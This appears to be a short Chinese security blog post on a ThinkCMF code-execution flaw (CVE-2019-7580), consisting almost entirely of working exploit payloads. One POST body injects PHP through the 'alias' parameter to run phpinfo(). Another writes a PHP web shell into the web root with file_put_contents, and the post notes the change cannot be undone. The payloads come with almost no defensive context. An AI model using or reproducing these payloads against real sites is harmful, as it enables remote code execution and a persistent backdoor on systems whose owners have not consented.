Close

24 5 月, 2024

(CVE-2019-7580) (thinkcmf文件包含)

thinkcmf 代码执行 (CVE-2019-7580)

parent_id=0&name=111&alias=1'%3D%3Earray(%22%22)%2Cphpinfo()%2C'2
Cookie:  PHPSESSID=cm9v41suspm0m1l699sf325876; admin_username=admin
Content-Type: application/x-www-form-urlencoded; charset=UTF-8;注意:成功后无法还原
parent_id=0&name=111&alias=1'=>array(""),file_put_contents('/var/www/html/public/shell.php','<?php eval($_POST[cmd]);?>'),'2

thinkcmf 文件包含 x1.6.0-x2.2.3